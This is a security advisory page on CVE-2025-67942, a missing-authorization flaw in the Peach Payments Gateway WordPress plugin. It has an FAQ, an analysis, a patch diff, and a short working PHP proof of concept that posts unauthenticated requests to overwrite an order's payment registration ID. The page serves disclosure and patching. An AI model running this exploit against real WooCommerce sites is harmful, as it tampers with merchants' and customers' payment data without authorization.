What is CVE-2025-67942?

CVE-2025-67942 is a security vulnerability in the Peach Payments Gateway plugin for WordPress, specifically versions up to and including 3.3.6. It is caused by a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions via AJAX requests.

How does this vulnerability work?

The vulnerability allows attackers to call AJAX handlers that do not verify user permissions. By sending a crafted POST request to the WordPress admin-ajax.php endpoint, attackers can manipulate WooCommerce order data without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Peach Payments Gateway plugin version 3.3.6 or earlier is affected. Site administrators should check their plugin version to determine if they need to take action.

How can I check if I am using a vulnerable version?

You can check your installed version of the Peach Payments Gateway plugin by navigating to the Plugins section in your WordPress admin dashboard. Look for the version number next to the plugin name.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Peach Payments Gateway plugin to version 3.3.7 or later, where the issue has been patched. Regularly updating all plugins is essential for maintaining site security.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Peach Payments Gateway plugin until you can apply the patch. This will prevent unauthorized access through the vulnerable AJAX handlers.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to prevent potential exploitation.

What are the practical risks of this vulnerability?

Successful exploitation could allow an attacker to modify payment-related data for WooCommerce orders. This could disrupt payment processing and lead to financial discrepancies or failures for customers.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable AJAX endpoint, specifying an order ID and a controlled payment registration ID. This demonstrates the ease of unauthorized access due to the lack of authentication checks.

What should I do after updating the plugin?

After updating the plugin, monitor your site for any unusual activity and consider conducting a security audit. Regularly review your security practices and ensure all plugins are kept up to date.

Where can I find more information about this vulnerability?

More information about CVE-2025-67942 can be found in the official CVE database and security advisories from the plugin developer. Additionally, security blogs and forums may provide insights into mitigation strategies and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67942: Peach Payments Gateway <= 3.3.6 – Missing Authorization (wc-peach-payments-gateway)

CVE ID CVE-2025-67942

Plugin wc-peach-payments-gateway

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.3.6

Patched Version 3.3.7

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67942:
The Peach Payments Gateway plugin for WordPress, versions up to and including 3.3.6, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to perform unauthorized actions by directly calling AJAX handlers that lack capability checks. The vulnerability has a CVSS score of 5.3, indicating a medium severity issue.

The root cause is the registration of AJAX handlers for both authenticated and unauthenticated users without verifying user permissions. The plugin registers the function `peachCardUpdateOrder_funct` to handle the `wp_ajax_nopriv_peachCardUpdateOrder` hook. This function, located in the main plugin file `woocommerce-gateway-peach-payments.php`, processes requests to update payment registration IDs on orders. The vulnerable code, present from line 3845 to line 3860 in the diff, directly accesses the `$_REQUEST` array for `cardID` and `orderID` parameters and updates post meta without any authorization checks. This allows any unauthenticated user to submit a request.

Exploitation requires an attacker to send a crafted POST request to the WordPress admin-ajax.php endpoint. The request must set the `action` parameter to `peachCardUpdateOrder`. The attacker must also supply the `cardID` and `orderID` parameters. The `orderID` specifies the target WooCommerce order, and the `cardID` is the new payment registration ID to be set via `update_post_meta`. No nonce or user session validation occurs in the vulnerable version, making the endpoint publicly accessible.

The patch in version 3.3.7 completely rewrites the `peachCardUpdateOrder_funct` function. The fix removes the `nopriv` action hook registration on line 3918, preventing unauthenticated access. The new function adds multiple security layers. It includes a nonce check via `check_ajax_referer`, verifies the user is logged in, sanitizes input using `sanitize_text_field` and `absint`, retrieves and validates the order object, and performs an ownership check. The authorization logic ensures the current user either owns the order or has the `manage_woocommerce` capability. The function now properly terminates with `wp_die` and appropriate HTTP status codes for security failures.

Successful exploitation allows an unauthenticated attacker to modify the `payment_registration_id` meta data of arbitrary WooCommerce orders. This could disrupt payment processing for those orders, potentially causing financial reconciliation issues or payment failures for customers. While the direct impact is limited to data modification within a specific meta field, altering payment-related data could be leveraged in broader attacks against the payment workflow.

Differential between vulnerable and patched code

Code Diff

--- a/wc-peach-payments-gateway/woocommerce-gateway-peach-payments.php
+++ b/wc-peach-payments-gateway/woocommerce-gateway-peach-payments.php
@@ -5,7 +5,7 @@
  * Description: A payment gateway for <a href="https://www.peachpayments.com/">Peach Payments</a>.
  * Author: Peach Payments
  * Author URI: https://peachpayments.com
- * Version: 3.3.6
+ * Version: 3.3.7
  * Requires at least: 6.8
  * Tested up to: 6.8
  * Text Domain: woocommerce-gateway-peach-payments
@@ -289,7 +289,8 @@
 						'INSTANTEFT' => 'InstantEFT',
 						'BLINKBYEMTEL' => 'Blink by EMTEL',
 						'MCBJUICE' => 'MCB Juice',
-						'FLOAT' => 'Float'
+						'FLOAT' => 'Float',
+						'MAUCAS' => 'MauCAS'
 					),
 					'default'     => array('VISA','MASTER', 'CAPITECPAY', 'EFTSECURE', 'MOBICRED', 'SCANTOPAY'),
 					'class'       => 'chosen_select checkout_methods',
@@ -336,7 +337,8 @@
 						'INSTANTEFT' => 'InstantEFT',
 						'BLINKBYEMTEL' => 'Blink by EMTEL',
 						'MCBJUICE' => 'MCB Juice',
-						'FLOAT' => 'Float'
+						'FLOAT' => 'Float',
+						'MAUCAS' => 'MauCAS'
 					),
 					'default'     => array('VISA','MASTER', 'CAPITECPAY', 'EFTSECURE'),
 					'class'       => 'chosen_select consolidated_label_logos',
@@ -619,9 +621,11 @@
 										$methodName = 'Capitec Pay';
 									}else if($value == 'MCBJUICE'){
 										$methodName = 'MCB Juice';
+									}else if($value == 'MAUCAS'){
+										$methodName = 'MauCAS';
 									}

-									if($index < 4){
+									if($index < 6){
 										$payIcons .= '<div class="peach-method"><img name="" src="'.WC_PEACH_PLUGIN_URL.'/assets/images/'.$value.'.png" width="38" height="20" alt="" /><div class="peach-method-tooltip">'.$methodName.'</div></div>';
 									}else{
 										$payIconsPop[] = $methodName;
@@ -792,6 +796,17 @@
 						$resultDescription = $response->result->description;
 					}
 					curl_close($ch);
+
+					$InitiatedTransactionID = '';
+					if (isset($response->resultDetails)) {
+						if (isset($response->resultDetails->CardholderInitiatedTransactionID)) {
+							$InitiatedTransactionID = $response->resultDetails->CardholderInitiatedTransactionID;
+						}
+					}else if(isset($response->standingInstruction)){
+						if(isset($response->standingInstruction->initialTransactionId)){
+							$InitiatedTransactionID = $response->standingInstruction->initialTransactionId;
+						}
+					}

 					$paymentBrand = '';
 					$paymentType = '';
@@ -858,7 +873,8 @@

 						add_post_meta( $seqOrderID, 'payment_order_id', $response->id );
 						add_post_meta( $seqOrderID, 'peach_api_trigger', 'process_payment' );
-						update_post_meta($seqOrderID, "_checkout_payment_option", $paymentBrand);
+						update_post_meta($seqOrderID, "_checkout_payment_option", $paymentBrand); //$InitiatedTransactionID
+						update_post_meta($seqOrderID, "payment_initial_id", $InitiatedTransactionID);

 						if ( is_user_logged_in() ) {
 							if(isset($response->registrationId) && $response->registrationId != ''){
@@ -972,6 +988,10 @@
 						update_post_meta( $status[1], "_checkout_payment_option", $status[3]);
 						add_post_meta( $seqOrderID, 'peach_api_trigger', 'process_payment' );

+						if(isset($status[4])){
+							update_post_meta($status[1], "payment_initial_id", $status[4]);
+						}
+
 						wp_safe_redirect($this->order_received_page_url.'/'.$orderNew->get_id().'/?key='.$orderNew->get_order_key() );
 						exit;
 					}else{
@@ -1061,6 +1081,19 @@
 						add_post_meta( $seqOrderID, 'peach_api_trigger', 'process_payment' );
 						update_post_meta($seqOrderID, "_checkout_payment_option", $paymentBrand);

+						$InitiatedTransactionID = '';
+						if (isset($_POST['resultDetails'])) {
+							if (isset($_POST['resultDetails']['CardholderInitiatedTransactionID'])) {
+								$InitiatedTransactionID = $_POST['resultDetails']['CardholderInitiatedTransactionID'];
+							}
+						}else if(isset($_POST['standingInstruction'])){
+							if(isset($_POST['standingInstruction']['initialTransactionId'])){
+								$InitiatedTransactionID = $_POST['standingInstruction']['initialTransactionId'];
+							}
+						}
+
+						update_post_meta($seqOrderID, "payment_initial_id", $InitiatedTransactionID);
+
 						wp_safe_redirect( $this->order_received_page_url.'/'.$orderNew->get_id().'/?key='.$orderNew->get_order_key() );
 						exit;
 					}else{
@@ -1220,6 +1253,7 @@
 			$result = '';

 			if(isset($this->recurringid) && $this->recurringid != ''){
+
 				$url = $this->process_checkout_url."/v1/registrations/".$id."/payments";
 				$data = "entityId=".$this->recurringid.
 							"&merchantTransactionId=" .$order_id.
@@ -1228,7 +1262,29 @@
 							"&paymentType=DB" .
 							"&standingInstruction.mode=REPEATED" .
 							"&standingInstruction.type=RECURRING" .
-							"&standingInstruction.source=MIT";
+							"&standingInstruction.source=MIT".
+							"&standingInstruction.recurringType=SUBSCRIPTION";
+
+				$payment_initial_id = get_post_meta( $parent_order_id, 'payment_initial_id', true );
+				$logger_id = array();
+				if ( ! empty( $payment_initial_id ) ) {
+					$logger_id['initial_id'] = $payment_initial_id;
+					$data .= "&standingInstruction.initialTransactionId=".$payment_initial_id;
+				}else{
+					$entityId = $this->secureid;
+					$transactionID = get_post_meta( $parent_order_id, 'payment_order_id', true );
+
+					$payment_initial_id = $this->getInitialID($this->accesstoken, $entityId, $transactionID);
+
+					if(!empty($payment_initial_id)){
+						$data .= "&standingInstruction.initialTransactionId=".$payment_initial_id;
+						$logger_id['initial_id'] = $payment_initial_id;
+					}else{
+						$logger_id['initial_id'] = 'Could not retrieve id via Peach API';
+						$logger_id['api-data-sent'] = $data;
+					}
+				}
+				$logger->info( "n".print_r($logger_id, true)."nn", array( 'source' => 'peach-get-payment-initial-id' ) );

 				$ch = curl_init();
 				curl_setopt($ch, CURLOPT_URL, $url);
@@ -1287,6 +1343,51 @@
 				WC_Subscriptions_Manager::process_subscription_payment_failure_on_order($parent_order);
 			}
 		}
+
+		function getInitialID($accesstoken, $entityId, $transactionID){
+			$logger = wc_get_logger();
+			$logger_info = array();
+
+			$url = $this->process_checkout_url.'/v3/query/'.$transactionID.'?entityId='.$entityId;
+
+			$headers = [
+				'Authorization: Bearer '.$accesstoken,
+				'Content-Type: application/x-www-form-urlencoded'
+			];
+
+			$data = http_build_query([
+				'entityId' => $entityId
+			]);
+
+			//First Test
+			$ch = curl_init();
+			curl_setopt_array($ch, [
+				CURLOPT_URL => $url,
+				CURLOPT_RETURNTRANSFER => true,
+				CURLOPT_CUSTOMREQUEST => 'GET',
+				CURLOPT_HTTPHEADER => $headers,
+				CURLOPT_POSTFIELDS => $data,
+			]);
+
+			$responseData = curl_exec($ch);
+			$response = json_decode($responseData);
+
+			$payment_initial_id = $CardholderInitiatedTransactionID = '';
+
+			if (!empty($response->records) && is_array($response->records)) {
+				foreach ($response->records as $record) {
+					if(!empty($record->resultDetails->CardholderInitiatedTransactionID)) {
+						$payment_initial_id = $record->resultDetails->CardholderInitiatedTransactionID;
+						break;
+					}else if(!empty($record->standingInstruction->initialTransactionId)){
+						$payment_initial_id = $record->standingInstruction->initialTransactionId;
+						break;
+					}
+				}
+			}
+
+			return $payment_initial_id;
+		}

 		function receipt_page( $order_id ) {

@@ -1294,18 +1395,6 @@

 			$logger = wc_get_logger();
 			$logger_info = array();
-			$logger_info['settings'] = $this->logger_info_settings;
-			$logger_info['urls'] = array(
-				'process_checkout' => $this->process_checkout_url,
-				'request_checkout' => $this->request_checkout_url,
-				'request_status' => $this->request_status_url,
-				'request_pre_status' => $this->request_pre_status_url,
-				'request_refund' => $this->request_refund_url,
-				'checkout_page' => $this->checkout_page_url,
-				'order_received_page' => $this->order_received_page_url,
-				'order_pay_page' => $this->order_pay_page_url,
-				'shopperResultUrl' => WC_PEACH_SITE_URL.'?wc-api=WC_Peach_Payments'
-			);

 			$seqOrderID = $order_id;

@@ -1444,7 +1533,6 @@
 			//First Check for Mixed Basked
 			if($subscribe_test[1]){
 				$logger_info['errors'] = array(
-					'Order ID' => $seqOrderID,
 					'Response' => 'Mixed baskets detected.',
 				);
 				$logger->info( "n".print_r($logger_info, true)."nn", array( 'source' => 'peach-receipt-page' ) );
@@ -1492,7 +1580,6 @@
 						if($this->embed_clientid == '' || $this->embed_clientsecret == '' || $this->embed_merchantid == ''){
 							$embed_errors = true;
 							$logger_info['errors'] = array(
-								'order' => $order_id,
 								'embed_token' => 'error',
 							);
 							$embed_error_txt = 'Invalid System Configuration. Please contact Support.';
@@ -1504,7 +1591,6 @@
 							}else{
 								$embed_errors = true;
 								$logger_info['errors'] = array(
-									'order' => $order_id,
 									'embed_token' => 'token error',
 								);

@@ -1610,6 +1696,7 @@
 					}

 				}else if($payOption == 'dontsave' || $payOption == 'saveinfo' || $payOption == 'savedcards'){
+
 					//New 3D Secure Rule. Address can't exceed 50 chars
 					$billing_address = substr($order->get_billing_address_1(),0,50);
 					$billing_address = str_replace('&', ' ',$billing_address);
@@ -1704,7 +1791,7 @@
 					$ch = curl_init();
 					curl_setopt($ch, CURLOPT_URL, $url);
 					curl_setopt($ch, CURLOPT_HTTPHEADER, array(
-								   'Authorization:Bearer '. $this->accesstoken));
+								'Authorization:Bearer '. $this->accesstoken));
 					curl_setopt($ch, CURLOPT_POST, 1);
 					curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
 					curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, $this->ssl_verifypeer);
@@ -1749,7 +1836,7 @@

 								var expiry = jQuery('.wpwl-control-expiry').val();
 								expiry = expiry.replace(/s/g, '');
-
+
 								var currentDate = new Date();
 								var inputYear = parseInt(expiry.substr(3, 2), 10) + 2000;
 								var inputMonth = parseInt(expiry.substr(0, 2), 10) - 1;
@@ -1781,16 +1868,16 @@
 										'font-size': '17px'
 									}
 								},
-								  onBeforeSubmitCard: function(e){
+								onBeforeSubmitCard: function(e){
 									return validateExpiry(e);
-								  }
+								}
 							}
 							function validateExpiry(e){
 								var currentYear = new Date().getFullYear();

 								var expiry = jQuery('.wpwl-control-expiry').val();
 								expiry = expiry.replace(/s/g, '');
-
+
 								var currentDate = new Date();
 								var inputYear = parseInt(expiry.substr(3, 2), 10) + 2000;
 								var inputMonth = parseInt(expiry.substr(0, 2), 10) - 1;
@@ -1823,7 +1910,7 @@
 							';
 						}

-						$brands_exclude = array("CAPITECPAY", "EFTSECURE", "MOBICRED", "1VOUCHER", "SCANTOPAY", "APPLE", "MPESA", "PAYFLEX", "ZEROPAY", "INSTANTEFT", "BLINKBYEMTEL", "MCBJUICE", "PAYPAL", "FLOAT" );
+						$brands_exclude = array("CAPITECPAY", "EFTSECURE", "MOBICRED", "1VOUCHER", "SCANTOPAY", "APPLE", "MPESA", "PAYFLEX", "ZEROPAY", "INSTANTEFT", "BLINKBYEMTEL", "MCBJUICE", "PAYPAL", "FLOAT", "MAUCAS" );
 						$brands_opts = $this->consolidated_label_logos;
 						if($brands_opts && $brands_opts != ''){
 							$brands = array_diff($brands_opts, $brands_exclude);
@@ -1836,7 +1923,6 @@
 					}else{
 						if(isset($responseData->result->description) && isset($responseData->result->code)){
 							$logger_info['errors'] = array(
-								'Order ID' => $order_id,
 								'Response Code' => $responseCode,
 								'Response' => (array)$responseData,
 							);
@@ -1844,14 +1930,12 @@
 							$order->add_order_note( 'Peach Error ['.$responseCode.'] - '.$responseData->result->description.'.',0,false);
 						}else if(isset($curlError)){
 							$logger_info['errors'] = array(
-								'Order ID' => $order_id,
 								'Response' => 'Error [Curl] '.$curlError
 							);
 							$order->add_order_note( 'Peach Error [Curl] - '.$curlError,0,false);
 							wc_add_notice(  'Error [Curl] - '.$curlError, 'error' );
 						}else{
 							$logger_info['errors'] = array(
-								'Order ID' => $order_id,
 								'Response' => (array)$responseData,
 							);
 							$order->add_order_note( 'Peach Error [Unknown] - Please contact Peach Payments.',0,false);
@@ -1979,7 +2063,25 @@
 			curl_close($ch);

 			if(isset($response->result->code)){
-				return array($response->result->code, $seqOrderID, $response->payments[0]->id, $response->payments[0]->paymentBrand);
+				$result = [
+					$response->result->code,
+					$seqOrderID,
+					$response->payments[0]->id,
+					$response->payments[0]->id
+				];
+
+				$InitiatedTransactionID = '';
+				if (isset($response->resultDetails)) {
+					if (isset($response->resultDetails->CardholderInitiatedTransactionID)) {
+						$result[] = $response->resultDetails->CardholderInitiatedTransactionID;
+					}
+				}else if(isset($response->standingInstruction)){
+					if(isset($response->standingInstruction->initialTransactionId)){
+						$result[] = $response->standingInstruction->initialTransactionId;
+					}
+				}
+
+				return $result;
 			}else{
 				$logger_info['error'] = array(
 					'Order' => $seqOrderID,
@@ -3532,7 +3634,7 @@
 			</style>
 			';

-			$brands_exclude = array("CAPITECPAY", "EFTSECURE", "MOBICRED", "1VOUCHER", "SCANTOPAY", "APPLE", "MPESA", "PAYFLEX", "ZEROPAY", "INSTANTEFT", "BLINKBYEMTEL", "MCBJUICE", "PAYPAL", "FLOAT" );
+			$brands_exclude = array("CAPITECPAY", "EFTSECURE", "MOBICRED", "1VOUCHER", "SCANTOPAY", "APPLE", "MPESA", "PAYFLEX", "ZEROPAY", "INSTANTEFT", "BLINKBYEMTEL", "MCBJUICE", "PAYPAL", "FLOAT", "MAUCAS" );
 			$brands_opts = $peachOptions['consolidated_label_logos'];
 			if($brands_opts && $brands_opts != ''){
 				$brands = array_diff($brands_opts, $brands_exclude);
@@ -3743,6 +3845,9 @@
 	return $combinedCards;
 }

+
+/* Old Function */
+/*
 function peachCardUpdateOrder_funct(){
 	$cardID = $_REQUEST['cardID'];
 	$orderID = $_REQUEST['orderID'];
@@ -3752,9 +3857,72 @@
 	echo $new_reg_id;
 	die();
 }
-add_action('wp_ajax_nopriv_peachCardUpdateOrder', 'peachCardUpdateOrder_funct');
+*/
+/* New Function */
+function peachCardUpdateOrder_funct() {
+
+	check_ajax_referer( 'ajax-nonce', 'ajax_nonce' );
+
+	if ( ! is_user_logged_in() ) {
+		wp_die(
+			esc_html__( 'Unauthorized', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 403 )
+		);
+	}
+
+	$card_id  = isset( $_REQUEST['cardID'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['cardID'] ) ) : '';
+	$order_id = isset( $_REQUEST['orderID'] ) ? absint( $_REQUEST['orderID'] ) : 0;
+
+	if ( ! $card_id || ! $order_id ) {
+		wp_die(
+			esc_html__( 'Invalid request parameters', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 400 )
+		);
+	}
+
+	$order = wc_get_order( $order_id );
+
+	if ( ! $order ) {
+		wp_die(
+			esc_html__( 'Invalid order', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 404 )
+		);
+	}
+
+	// Authorisation: user must own the order or have manage_woocommerce capability.
+	$current_user_id = get_current_user_id();
+	$order_user_id   = (int) $order->get_user_id();
+
+	if ( $order_user_id && $order_user_id !== $current_user_id && ! current_user_can( 'manage_woocommerce' ) ) {
+		wp_die(
+			esc_html__( 'You are not allowed to modify this order', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 403 )
+		);
+	}
+
+	// Guest orders (no user attached) can only be updated by privileged users.
+	if ( ! $order_user_id && ! current_user_can( 'manage_woocommerce' ) ) {
+		wp_die(
+			esc_html__( 'You are not allowed to modify this order', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 403 )
+		);
+	}
+
+	$new_reg_id = update_post_meta( $order_id, 'payment_registration_id', $card_id );
+
+	echo (int) $new_reg_id;
+	wp_die();
+}
+//add_action('wp_ajax_nopriv_peachCardUpdateOrder', 'peachCardUpdateOrder_funct'); Removed for Security
 add_action('wp_ajax_peachCardUpdateOrder', 'peachCardUpdateOrder_funct');

+/*Olf Function*/
+/*
 function peachEmbedUpdateOrder_funct(){
 	$status = $_REQUEST['mystatus'];
 	$transactionID = $_REQUEST['transaction'];
@@ -3784,6 +3952,92 @@
 	echo $return_url;
 	die();
 }
+*/
+
+/*New Function*/
+function peachEmbedUpdateOrder_funct() {
+
+	check_ajax_referer( 'ajax-nonce', 'ajax_nonce' );
+
+	$status        = isset( $_REQUEST['mystatus'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['mystatus'] ) ) : '';
+	$transactionID = isset( $_REQUEST['transaction'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['transaction'] ) ) : '';
+	$code          = isset( $_REQUEST['mycode'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['mycode'] ) ) : '';
+	// Optional extra protection – front-end can send the order key as well.
+	$order_key     = isset( $_REQUEST['order_key'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['order_key'] ) ) : '';
+
+	$return_url = '';
+
+	if ( '' === $transactionID || '' === $status || '' === $code ) {
+		wp_die(
+			esc_html__( 'Invalid request', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 400 )
+		);
+	}
+
+	$originalid = str_replace( 'Checkout', '', $transactionID );
+	$id         = absint( ltrim( $originalid, '0' ) );
+
+	if ( ! $id ) {
+		wp_die(
+			esc_html__( 'Invalid transaction reference', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 400 )
+		);
+	}
+
+	$order = wc_get_order( $id );
+
+	if ( ! $order ) {
+		wp_die(
+			esc_html__( 'Order not found', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 404 )
+		);
+	}
+
+	// If an order key is supplied, it must match this order.
+	if ( $order_key && $order_key !== $order->get_order_key() ) {
+		wp_die(
+			esc_html__( 'Order verification failed', 'woocommerce-gateway-peach-payments' ),
+			'',
+			array( 'response' => 403 )
+		);
+	}
+
+	// If the order is attached to a user and the requester is logged in,
+	// enforce ownership or manage_woocommerce capability.
+	$order_user_id = (int) $order->get_user_id();
+	if ( is_user_logged_in() && $order_user_id ) {
+		$current_user_id = get_current_user_id();
+		if ( $current_user_id !== $order_user_id && ! current_user_can( 'manage_woocommerce' ) ) {
+			wp_die(
+				esc_html__( 'You are not allowed to modify this order', 'woocommerce-gateway-peach-payments' ),
+				'',
+				array( 'response' => 403 )
+			);
+		}
+	}
+
+	// Only accept known status/code combinations.
+	if ( 'complete' === $status && '000.100.110' === $code ) {
+		$order->add_order_note( 'Peach Embedded Payment Successfull.', 0, false );
+		$order->update_status( 'processing', __( 'Order being processed.', 'woocommerce' ) );
+		add_post_meta( $id, 'peach_api_trigger', 'process_embedded' );
+		$return_url = $order->get_checkout_order_received_url();
+	} elseif ( 'cancelled' === $status ) {
+		$order->add_order_note( 'Peach Embedded Payment Cancelled.', 0, false );
+		$return_url = $order->get_cancel_order_url_raw();
+	} else {
+		$order->add_order_note( 'Peach Embedded Payment Expired.', 0, false );
+		$return_url = $order->get_cancel_order_url_raw();
+	}
+
+	$order->save();
+
+	echo esc_url_raw( $return_url );
+	wp_die();
+}
 add_action('wp_ajax_nopriv_peachEmbedUpdateOrder', 'peachEmbedUpdateOrder_funct');
 add_action('wp_ajax_peachEmbedUpdateOrder', 'peachEmbedUpdateOrder_funct');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67942 - Peach Payments Gateway <= 3.3.6 - Missing Authorization

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// The vulnerable AJAX action
$post_data = array(
    'action' => 'peachCardUpdateOrder',
    'cardID' => 'attacker_controlled_registration_id',
    'orderID' => 123 // Target order ID
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Disable SSL verification for testing environments
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Code: $http_coden";
    echo "Response: $responsen";
    // A successful exploitation attempt will return '1' (or the meta ID) from update_post_meta
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-67942?
Understanding the vulnerability
CVE-2025-67942 is a security vulnerability in the Peach Payments Gateway plugin for WordPress, specifically versions up to and including 3.3.6. It is caused by a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions via AJAX requests.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to call AJAX handlers that do not verify user permissions. By sending a crafted POST request to the WordPress admin-ajax.php endpoint, attackers can manipulate WooCommerce order data without authentication.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Peach Payments Gateway plugin version 3.3.6 or earlier is affected. Site administrators should check their plugin version to determine if they need to take action.
How can I check if I am using a vulnerable version?
Verifying plugin versions
You can check your installed version of the Peach Payments Gateway plugin by navigating to the Plugins section in your WordPress admin dashboard. Look for the version number next to the plugin name.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Peach Payments Gateway plugin to version 3.3.7 or later, where the issue has been patched. Regularly updating all plugins is essential for maintaining site security.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the Peach Payments Gateway plugin until you can apply the patch. This will prevent unauthorized access through the vulnerable AJAX handlers.
What does a CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential impacts on your site
Successful exploitation could allow an attacker to modify payment-related data for WooCommerce orders. This could disrupt payment processing and lead to financial discrepancies or failures for customers.
How does the proof of concept demonstrate the issue?
Analyzing the proof of concept
The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable AJAX endpoint, specifying an order ID and a controlled payment registration ID. This demonstrates the ease of unauthorized access due to the lack of authentication checks.
What should I do after updating the plugin?
Post-update best practices
After updating the plugin, monitor your site for any unusual activity and consider conducting a security audit. Regularly review your security practices and ensure all plugins are kept up to date.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-67942 can be found in the official CVE database and security advisories from the plugin developer. Additionally, security blogs and forums may provide insights into mitigation strategies and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations